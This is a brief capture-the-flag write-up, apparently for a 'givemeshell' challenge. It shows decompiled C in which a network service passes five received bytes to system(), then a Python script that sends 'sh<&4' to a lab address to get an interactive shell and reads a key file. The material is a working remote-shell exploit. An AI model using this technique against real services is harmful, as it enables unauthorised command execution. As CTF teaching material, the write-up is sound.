int __cdecl important_part(int fd)
{
int v1; // edx@1
int v2; // ecx@1
int result; // eax@3
char cmd; // [sp+16h] [bp-12h]@1
int canary; // [sp+1Ch] [bp-Ch]@1
canary = *MK_FP(__GS__, 20);
memset(&cmd, 0, 6u);
if ( recv(fd, &cmd, 5u, 0) > 0 ) // recv only 5byte
system(&cmd); // executes user input(5byte)
result = *MK_FP(__GS__, 20) ^ canary;
if ( *MK_FP(__GS__, 20) != canary )
__stack_chk_fail(v2, v1);
return result;
}
this is the important part.
only accepts 5bytes from user and executes it.
idea : sh<&4 sh>&4
exploit code
#!/usr/bin/python
from socket import *
def shell():
cmd = raw_input("$ ")
s.send(cmd+"\n")
print s.recv(1024)
s = socket(AF_INET,SOCK_STREAM)
s.connect(('10.211.55.4',8989))
s.send("sh<&4")
s.send("sh>&4\n")
while True:
shell()
s.close()
result
mangoui-MacBook-Pro:~ kjungi704$ ./givemeshell.py
$ cat key
this is key
clear!